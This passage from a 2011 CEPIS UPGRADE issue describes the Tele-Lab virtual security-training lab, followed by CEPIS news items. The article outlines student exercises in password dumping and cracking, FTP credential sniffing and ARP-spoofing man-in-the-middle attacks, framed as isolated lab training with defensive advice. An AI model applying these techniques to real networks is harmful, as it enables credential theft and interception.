e.g. authentication, wireless networks,
secure e-mail, etc. The system can easily be enhanced with new content. For
example, in a project participating the
Hasso-Plattner-Institute, the Vilnius
Gediminas Technical University
(VGTU), nSoft and Amalgama Information Management Ltd., new learning units were easily added to the
VGTU implementation of Tele-Lab,
<http://telelab.vgtu.lt>, and have been
shared among partners. The content
was translated for Lithuanian language
localization. For the future, the project
consortium plans to add more learning
units and expand localization for the
Greek language.
Architecture of the Tele-Lab Server
The current architecture of the Tele-
148
Lab 2.0 server is a refactored enhancement to the infrastructure presented in
[6]. Basically, it consists of the following components (illustrated in Fig. 2).
Portal and Tutoring Environment:
The Web-based training system of
Tele-Lab is a custom Grails3 application running on a Tomcat application
server. This web application handles
user authentication, allows navigation
through learning units, delivers their
content and keeps track of the students’
progress. It also provides controls to
request a team of virtual machines for
performing an exercise. The Portal and
Tutoring Environment (along with the
Database and Administration Interface
components described later on) offer
tutors and students facilities of a Learning Management System, such as centralized and automated administration,
assembly and delivery of learning content, reuse of the learning units, etc.
[11]
Virtual Machine Pool: The server
is loaded with a set of different virtual
machines needed for the exercise scenarios – the pool. The resources of the
physical server limit the maximum total number of VMs in the pool. In practice, a few (3-5) machines of every kind
are started up. Those machines are dynamically connected to teams and
bound to a user on request. The current hypervisor solution used to provide the virtual machines is KVM/
Qemu4 . The way virtual machines are
used in Tele-Lab’s architecture, allow
for further creative ways to allocate
”
resources in an optimized and collaborative manner, by setting collaboration
among different instances of the TeleLab system that are installed on different sites: in the example of the
abovementioned consortium, HPI’s
and VGTU’s Tele-Lab servers share resources in order to dynamically provide virtual machines to each other,
when needed. For example: if a student from VGTU requests to conduct
a laboratory exercise, but the VGTU’s
Tele-Lab server has already reached the
maximum limit of VMs that can be allocated, it automatically requests HPI’s
Tele-Lab server to allocate a VM from
its own resources (and vice versa). This
automatic process occurs seamlessly,
so the user does not experience any disruptions. In the future, this collaboration arrangement can easily be expanded into a grid of different institutions, sharing their Tele-Lab server’s
resources to each other, thus evenly
distributing the whole process workload, when e.g. there is a peak in VM
demand at one of the partners’ site.
2
BackOrifice (BO) is a Remote Access Trojan Horse developed by the hacker group
„Cult of the Dead Cow", see <http://
www.cultdeadcow.com/tools/bo.php>.
3
Grails is an open-source frame work for
web application development, see <http://
www.grails.org/>.
4
See <http://www.linux-kvm.org/ and http:/
/www.qemu.org>/.
“
Students perform those exercises
on virtual machines (VM) on the server,
which they operate via remote
desktop access
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
Farewell Edition
© CEPIS
UPENET
For the network connections within
the teams, Tele-Lab uses the Virtual
Distributed Ethernet (VDE)5 package.
VDE emulates all physical aspects of
Ethernet LANs, in software. The TeleLab Control Services launch virtual
switches or hubs for each virtual network defined for a team of VMs and
connect the machines to the appropriate network infrastructure. For the distribution of IP addresses in the virtual
networks, a DHCP server is attached
to every network. After sending out all
leases, the DHCP server is killed due
to security constraints. [7]
Database: The Tele-Lab database
holds all user information, the content
for web-based training and learning
unit structure as well as the information on virtual machine and team templates. A VM template is the description of a VM disk image that can be
cloned in order to get more VMs of that
type. Team templates are models for
connected VMs that are used to perform certain exercises. The database
also persists current virtual machine
states.
Remote Desktop Access Proxy: The
Tele-Lab server must handle concurrent remote desktop connections for
users performing exercises. This is realized using the open-source project
noVNC6 , a client for the Virtual Network Computing Protocol based on
HTML5 Canvas and WebSockets. The
noVNC package comes with the
HTML5 client and a WebSockets
proxy which connects the clients to the
VNC servers provided by QEMU. Ensuring a protected environment for
both the Tele-Lab users and system is
a challenge that is important to thoroughly implement at all levels, as the
issue of network security for virtual
machines in a Cloud Computing setting (such as the case of Tele-Lab)
poses special requirements. [8] The
system uses a token-based authentication system: an access token for a re-
mote desktop connection is generated,
whenever a user requests a virtual machine team for performing an exercise.
Using TLS ensures the confidentiality
of the token.
Administration Interface: The TeleLab server comes with a sophisticated
web-based administration interface
that is also implemented as a Grails
application (not depicted in Fig. 2). On
the one hand, this interface is made for
content management in the web-based
training environment and on the other,
for user management. Additionally, the
admin interface can be used for manual
virtual machine control, monitoring
and for registering a new virtual machine or team templates.
Tele-Lab Control Services: The
purpose of the central Tele-Lab control services is bringing all the above
components together. To realize an
abstraction layer for encapsulation of
the virtual machine monitor (or
hypervisor) and the remote desktop
proxy, the system implements a
number of lightweight XML-RPC web
services. The vmService is for controlling virtual machines – start, stop or
recover them, grouping teams or assigning machines or teams to a user.
The remoteDesktopService is used to
initialize, start, control and terminate
remote desktop connections to assigned machines. The above-mentioned Grails applications (portal, tutoring environment, and web admin)
allow the user to control the whole system using the web services.
On the client side, the user only needs
a web browser supporting SSL/TLS. The
current implementation of the noVNC
client does not even need an HTML5capable browser: for older browsers,
HTML5 Canvas and/or the WebSockets
are emulated using Adobe Flash.
IT Security Exercises
As stated before, one of the
strengths of Tele-Lab (and other iso-
5
See <http://vde.sourceforge.net/>.
See <http://kanaka.github.com/noVNC/>.
7
See i.e. <http://www.rsa.com/solutions/consumer_authentication/reports/9381_
Aberdeen_Strong_User_Authentication.pdf>.
8
See <http://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords/>.
6
© CEPIS
Farewell Edition
lated laboratories) is the ability to provide secure training environments for
exercises, where the student takes the
perspective of an attacker. Next to the
learning unit on Trojan horses presented in chapter 2, we introduce a set
of additional exercise scenarios to illustrate this approach: Attacks on Accounts and Passwords, Eavesdropping
of Network Traffic, and a Man-in-theMiddle Attack.
Exercise Scenario A: Attacks on
Accounts and Passwords
Gaining valid user credentials for
a computer system is obviously major
objective for any attacker. Hackers can
get access to personal and confidential data or use a valid login as a starting point for numerous further attacks,
such as gaining privileged access to
their target system.
It is well known that one should set
a password consisting of letters (upper and lower case), numbers and special characters. Moreover, the longer a
password is, the harder it is to crack.
Thus, it is inherently important for a
user to choose strong credentials – even
though passwords of high complexity
are harder to memorize.
Studies 7 show, that users still
choose very weak passwords, if allowed so. In December 2009, a hacker
stole passwords from the popular
online platform rockyou.com and released a dataset of 32 million passwords to the Internet8 . An analysis of
those passwords revealed several interesting findings:
„ 30% of the users chose passwords with a length of 6 characters or
less, 50% had a password not longer
than 7 characters
„ Almost 60% of the users chose
their password from a limited set of
alphanumeric characters
„ Nearly 50% used names, slang
words, dictionary words or trivial passwords (consecutive digits, adjacent
keyboard keys, and so on)
The learning unit on Password Security explains how passwords are
stored within computer systems (i.e.
password hashes in Linux), and how
tools like Password Sniffers, Dumpers
and Crackers work.
CEPIS UPGRADE Vol. XII, No. 5, December 2011 149
UPENET
Figure 3: Man-in-the-Middle Attacks.
In the exercise section, the user is
asked to experience how fast weak
passwords can be cracked. On the
training machine (Windows XP) the
user must dump the passwords to a file
using PwDump, and crack the hashes
with the well-known John-the-Ripper9
password recovery tool. It gets obvious, that passwords like the username
or words from dictionaries usually can
be cracked within a few seconds.
The learning unit concludes with
hints, how to choose a strong password
that can be memorized easily.
Exercise Scenario B: Eavesdropping of Network Traffic
The general idea of eavesdropping
is to secretly listen to the private communication of two (or more) communication partners without their consent.
In the domain of computer networks,
the common technique for eavesdropping is packet sniffing. There are a
number of tools for packet sniffing –
packet analyzers – freely available on
the Internet, such as the well-known
tcpdump or Wireshark10 (used in this
learning unit).
A learning unit on packet sniffing
in a local network starts with an introduction to communication on the datalink layer (Ethernet) and explains the
difference between a network with a
hub and a network in a switched environment.
This is important for eavesdropping, because this kind of attack is
much easier when connected to a hub.
The hub will forward every packet
coming in to all its ports and hence to
all connected computers. These hosts
decide if they accept and further compute the incoming data based on the
MAC address in the destination field
of the Ethernet frame header: if the
destination MAC is their own MAC
address, the Ethernet frame is accepted,
or dropped otherwise. If there is a
packet analyzer running, also frames
9
See <http://www.openwall.com/john> for information on John-the-Ripper, <http://
www.foofus.net/~fizzgig/pwdump/> for PwDump6.
10
See <http://www.wireshark.org/>.
“
150
not intended for the respective host can
be captured, stored and analyzed. This
situation is different in a switched network: the switch does not broadcast
incoming data to all ports but interprets
the MAC destination to "switch" a
dedicated line between source and destination ports. In consequence, the
Ethernet frame is only delivered to the
actual receiver.
After this general information on
Ethernet-based networking, the learning unit introduces the idea of packet
sniffing and describes capabilities and
usage of the packet analyzer
Wireshark, especially on how to capture data from the Ethernet device and
how to filter and read the captured data.
The practical exercise presents the
following task to the learner: "Sniff and
analyze network traffic on the local
network. Identify login credentials and
use them to obtain a private document." The student is challenged to
enter the content of this private document to proof, that he/she has solved
the task.
When requesting access to a training environment, the user is assigned
to a team of three virtual machines: the
attacker machine that is equipped with
the Wireshark tool, and two machines
of (scripted) communication partners:
Alice and Bob. In this scenario, Bob’s
machine hosts an FTP server and a Web
server, while Alice’s VM runs a script
that generates traffic by initiating arbitrary connections to the services on
Bob’s host. Among those client/server
connections are successful logins to
Bob’s FTP server. As this learning unit
focuses on sniffing and the interpretation of the captured traffic of the machines are connected with a hub. There
is no need for the attacker to get into a
Man-in-the-Middle position in order to
capture the traffic between Alice and
Bob.
With Tele-Lab 2.0, the platform introduced the dynamic
assignment of several virtual machines
to a single user at the same time
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
Farewell Edition
© CEPIS
UPENET
“
The continuous evolvement of the issue of IT security
demands for a constant updating the curriculum
with new learning units
”
Since FTP does not encrypt credentials, the student can obtain username
and password to log in to that service.
On the server, the student finds a file
called private.txt that contains the response to the challenge mentioned
above.
The section concludes with hints on
preventing eavesdropping attacks,
such as the usage of services with secure authentication methods (i.e. SFTP
or ftps instead of plain FTP) and data
encryption.
Exercise Scenario C: Man-in-theMiddle Attack with ARP Spoofing
The general idea of a Man-in-theMiddle attack (MITM) is to intercept
communication between two communi-cation partners (Alice and Bob)
by initiating connections between the
attacker and both victims and spoofing the identity of the respective communication partner (Fig. 3). More specifically, the attacker pretends to be
Bob and opens a connection to Alice
(and vice versa). All traffic between
Alice and Bob is being relayed via the
attacker’s computer. While relaying,
the messages can be captured and/or
manipulated.
MITM attacks can be implemented
on different layers of the TCP/IP network stack, i.e. DNS cache poisoning
on the application layer, ICMP redirecting on the internet layer or ARP
spoofing in the data-link layer. This
learning unit focuses on the last-mentioned attack, which is also called ARP
cache poisoning.
The Address Resolution Protocol
(ARP) is responsible for resolving IP
addresses to MAC addresses in a local
network. When Alice’s computer
opens an IP-based connection to Bob’s
computer in the local network, it has
to determine Bob’s MAC address at
first, since all messages in the LAN are
transmitted via the Ethernet protocol
(which is only aware about the MAC
© CEPIS
addresses). If Alice only knows the IP
address of Bob’s host, (i.e.
192.168.0.10) she performs an ARP
request: Alice sends a broadcast message to the local network and asks,
"Who has the IP address
192.168.0.10?" Bob’s computer answers with an ARP reply that contains
its IP address and the corresponding
MAC address. Alice stores that address
mapping in her ARP cache for further
communication.
ARP spoofing [10] is basically
about sending forged ARP replies: referring to the above example, the attacker repeatedly sends ARP replies to
Alice with Bob’s IP address and MAC
address – the attacker pretends to be
Bob. When Alice starts to communicate with Bob, she sends the ARP request and instantly receives one of the
forged ARP replies from the attacker.
She then mistakenly thinks that the attacker’s MAC address belongs to Bob
and stores the faked mapping in her
ARP cache. Since the attacker performs the same operation for Alice’s
MAC address, he/she can also manage
to trick Bob, that his/her MAC address
is the one of Alice. In consequence,
Alice sends all messages to Bob to the
MAC address of the attacker (and the
same applies for Bob’s messages to
Alice). The attacker just has to store
the original MAC addresses of Alice
and Bob to be able to relay to the original receiver.
A learning unit on ARP spoofing
begins with general information on
communication in a local network. It
explains the Internet Protocol (IP),
ARP and Ethernet including the relationship between the two addressing
schemes (IP and MAC addresses).
Subsequently, the above attack is
described in detail and a tool, that implements ARP spoofing and a number
of additional MITM attacks is presented: Ettercap11 . At this point, the
learning unit also explains what the
Farewell Edition
attacker can do, if he/she becomes
Man-in-the-Middle successfully, such
as specifying Ettercap filters to manipulate the message stream.
The hands-on exercise of this chapter asks the student to perform two different tasks. The first one is the same
as described in the exercise on packet
sniffing above: to monitor the network
traffic, gain FTP credentials and steal
a private file from Bob’s FTP server.
The training environment is also set up
similarly to the prior scenario. The difference is that this time the team of
three virtual machines is connected
through a virtual switch (instead of a
hub), so that capturing the traffic with
Wireshark would not reveal the messages between Alice and Bob. Again,
the student has to proof the successful
attack by putting in the content of the
secret file in the tutoring interface.
The second (optional) task is to
apply a filter on the traffic and replace
all images in the transmitted HTML
content by an image from the attacker’s host (which would be displayed in
Alice’s browser).
This kind of attack is still working
and dangerous in many currently deployed local network installations. The
only way to protect oneself against
ARP spoofing would be the usage of
SSL with a careful verification of the
host’s certificate, which is explained in
the conclusion of the learning unit.
A future enhancement of the practical exercise on ARP spoofing would
be the interception of an SSL secured
channel: Ettercap also allows a more
sophisticated MITM attack including
the on-the-fly generation of faked SSL
certificates, which are presented to the
victims instead of the original ones.
The Man-in-the-Middle can then decrypt and re-encrypt the SSL traffic
when relaying the messages.
11
See <http://ettercap.sourceforge.net/>.
CEPIS UPGRADE Vol. XII, No. 5, December 2011 151
UPENET
“
The Tele-Lab consortium partners share knowledge,
development tasks, functionalities, new curriculum content
and resources
Outlook and Conclusion
The Tele-lab system has been developed in order to attend to the particular challenges and needs posed in
IT security training and IT security
laboratory settings. First of all, it is
essential for an IT security course to
be able to provide real hands-on experience to the learners, by using the necessary systems and contemporary IT
security tools. For this, the use of virtual machines is an obvious approach
in order to, on one hand, deliver realistic hands-on exercises to the learners and on the other hand, to isolate
such exercises from the "real" network
infrastructure of the training provider.
The continuously increasing importance of the issue of IT security, as it is
presented everyday in the mass media,
and the very serious negative repercussions it can bring nowadays, pushes for
more awareness and a more imperative
need for IT security knowledge and
practical skills. Academic institutions
and training providers need to provide
such training that is in the state of the
art, however, constructing an IT Security training environment (i.e., a computer laboratory devoted to IT security
training) requires knowledge, a considerable upfront investment for acquisition, costs for administration and maintenance) and poses risks when there are
omissions in properly insulating such
physical laboratories from the rest of
the network infrastructure. Tele-Lab
mitigates those difficulties by providing a fairly cheaper solution, that adds
up to nearly no effort at all for maintenance and administration.
More important, the continuous
evolvement of the issue of IT security
(that evolves in parallel to, and perplexes with, all innovations in ICT)
demands for a constant updating the
curriculum with new learning units, or
update existing learning units with new
perplexing factors. Although Tele-Lab
provides the facilities for easy addition
152
”
of new learning units and exercises, the
big feat of updating the knowledge
base can be achieved by collaboration
of different institutions that are using
Tele-Lab, and sharing amongst them
the new learning units and newly constructed system functionalities. Also
sharing resources (e.g. Virtual Machines) in order to even the systems
workload is a valuable outcome of such
cooperations. In the example of the
project consortium mentioned in section 2 and 3, such arrangements have
already been put in place, and the consortium partners share knowledge, development tasks, functionalities, new
curriculum content and resources.
It is a challenge to prove that TeleLab, in combination with such a collaborative and evolving model of cooperation among networks of institutions, can achieve delivering an innovative and always updated course of
high standards, that can address the
difficulties faced in modern IT security training.
References
[1] C. Border. The development and
deployment of a multi-user, remote access virtualization system
for networking, security, and system administration classes.
SIGCSE Bulletin, 39(1): 576–
580, 2007.
[2] J. Hu, D. Cordel, and C. Meinel.
A Virtual Machine Architecture
for Creating IT-Security Laboratories. Technical report, HassoPlattner-Insitut, 2006.
[3] J. Hu and C. Meinel. Tele-Lab ITSecurity on CD: Portable, reliable
and safe IT security training.
Computers & Security, 23:282–
289, 2004.
[4] J. Hu, M. Schmitt, C. Willems,
and C. Meinel. A tutoring system
for IT-Security. In Proceedings of
the 3rd World Conference in Information Security Education,
CEPIS UPGRADE Vol. XII, No. 5, December 2011
pages 51–60, Monterey, USA,
2003.
[5] C. Willems and C. Meinel. Awareness Creation mit Tele-Lab ITSecurity: Praktisches Sicherheit
straining im virtuellen Labor am
Beispiel Trojanischer Pferde. In
Proceedings of Sicherheit 2008,
pages 513–532, Saarbrücken,
Germany, 2008.
[6] C. Willems and C. Meinel. TeleLab IT-Security: an Architecture
for an online virtual IT Security
Lab. International Journal of
Online Engineering (iJOE), X,
2008.
[7] C. Willems and C. Meinel, Practical Network Security Teaching
in a Virtual Laboratory. In Proceedings of Security and Management 2011, Las Vegas, USA, 2011
(to appear).
[8] C. Willems, W. Dawoud, T.
Klingbeil, and C. Meinel. Security in Tele-Lab – Protecting an
Online Virtual Lab for IT Security Training, In Proceedings of
ELS’09 (in conjunction with 4th
ICITST), IEEE Press, London,
UK, 2009.
[9] W. Yurcik and D. Doss. Different
approaches in the teaching of information systems security. In Security, Proceedings of the Information Systems Education Conference, pages 32–33, 2001.
[10] S. Whalen. An Introduction to
ARP Spoofing. Online: <http://
www.rootsecure.net/content/
downloads/pdf/arp_spoofing_
intro.pdf>.
[11] J. Bersin, C. Howard, K.
O’Leonard, and D. Mallon.
Learning Management Systems
2009, Technical Report, Bersin &
Associates, 2009. Online: <http:/
/ w w w. b e r s i n . c o m / L i b / R s /
Details.aspx?docid=10339576>.
Farewell Edition
© CEPIS
CEPIS News
CEPIS Projects
Selected CEPIS News
Fiona Fanning
e-Skills and ICT Professionalism Interim Report Now Published
The interim report of the e-Skills
and ICT Professionalism project has
been published. This project is conducted by CEPIS and the Innovation
Value Institute (IVI) on behalf of the
European Commission. The synthesis
report marks the halfway point of the
research which is due to be completed
in 2012 and also signifies the end of
phase 1 of the project. CEPIS and IVI
aim to provide detailed proposals for a
European Framework for ICT Professionalism, and a European Training
Programme for ICT Managers in the
final report.
Phase 1 combined desktop research, analysis, and hundreds of interviews with ICT experts from across
Europe, North America and Asia Pacific through the ICT Professionalism
Survey. The research analysis so far
suggests that the following four key
areas act as building blocks for an ICT
profession:
„ a common body of knowledge
„ competences
„ certification, standards and qualifications
„ professionals ethics/codes of
conduct
CEPIS would like to thank all of
their Members who participated in the
ICT Professionalism Survey and who
provided essential expert information
about their attitudes to structures of
professionalism within ICT. We also
welcome any further comments.
The European ICT Professionalism
Project Interim Report can be
downloaded at: <http://www.cepis.org/
media/EU_ICT_Prof_interim_report_
PublishedVersion1.pdf>.
© CEPIS
Scoreboard shows only a Third
of World’s Top 50 R&D Investors
are European
The 2011 EU Industrial R&D Investment Scoreboard which ranks the
world’s top 1,400 companies by their
R&D investment during 2010 has just
been published by the European Commission. Overall, R&D investment by
European companies has increased by
6.1% following the post-economic crisis decrease of 2.6% in 2009. However
US companies reported an even higher
rate of R&D investment at 10% during 2010.
European companies continue to lag
behind other global R&D investors especially since only 15 of the top 50 companies in the world to invest in R&D
during 2010 are European. Most of the
non-EU companies in the top 50 with the
largest increases were in the pharmaceutical and ICT sector, yet for those European companies only four companies
were in ICT. You can access the 2011
EU Industrial R&D Investment Scoreboard at: <http://iri.jrc.ec.europa.eu/research/docs/2011/SB2011.pdf>.
European Commission Proposes s80 Billion Horizon 2020 Programme for Research and Innovation
The European Commission recently announced a new programme
for investment in research and innovation called Horizon 2020. Horizon
2020 will bring together all EU research and innovation funding together
under one programme, and in doing so
aims to simplify rules, procedures and
greatly reduce the amount of time-consuming bureaucracy associated with
funding programmes until now.
Farewell Edition
Funding will be focused towards
three main objectives:
„ Support Europe’s position as a
world leader in science
„ Help source industrial leadership in innovation
„ Address major concerns across
several themes such as energy efficiency and inclusive, innovative and
secure societies
The proposal and overall budget of
Horizon 2020 is currently under negotiation with the European Parliament
and the Council of Europe, and by
January 2014 the first calls for proposals are expected to be launched. Horizon 2020 is the financial instrument of
the flagship initiative Innovation Union and forms part of the drive to create new growth and jobs in Europe. To
find out more about Horizon 2020,
please click here: <http://ec.europa. eu/
research/horizon2020/index_en.cfm?
pg=home>.
CEPIS Research shows Gender
Imbalance in the IT Profession
Risks Europe’s Growth Potential
Less than one fifth of European IT
professionals are women according to
new research that calls for Europe to
urgently redress the gender imbalance.
Highly skilled roles and enough human
capital to fill these jobs will be vital
for the smart growth economy that
Europe aspires to create by 2020. Yet
a recent European report as announced
in the last issue of CEPIS UPGRADE
by the Council of European Professional Informatics Societies (CEPIS)
shows that women represent only 8%
of IT professionals in some countries.
With few women entering the IT profession as the demand for skilled IT
CEPIS UPGRADE Vol. XII, No. 5, December 2011 153
CEPIS News
professionals increases, Europe’s economic success may be jeopardized.
The research identified and analysed
the e-competences of almost 2,000 IT
professionals across 28 countries in
greater Europe. It presents an up-to-date
snapshot of the e-competences held by
IT professionals today and it shows that
worryingly, less than one fifth of IT professionals in Europe are female. In
the European report CEPIS puts forward
key recommendations for action, including a call for all countries to urgently redress the gender imbalance and increase
the participation of women in IT careers,
<http://cepis.org/media/CEPIS_Prof_
eComp_Pan_ Eu_Report_FINAL_
101020111.pdf>.
CEPIS recommends that existing
initiatives with a focus on role models
and mentoring programmes, such as
the European Commission’s Shadowing Days, should be replicated and
scaled up.
Another means to encourage a better balance would be to provide fiscal
incentives for companies that adopt
gender equity as part of their organisational culture, hiring practices and
career advancement programmes.
CEPIS strongly believes that the European Commission has a role to play
in continuing to promote a European
culture of gender equity in the IT profession. You can read more about the
CEPIS Professional e-Competence
Project at: <http://www.cepis.org/
professionalecompetence>.
154
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© CEPIS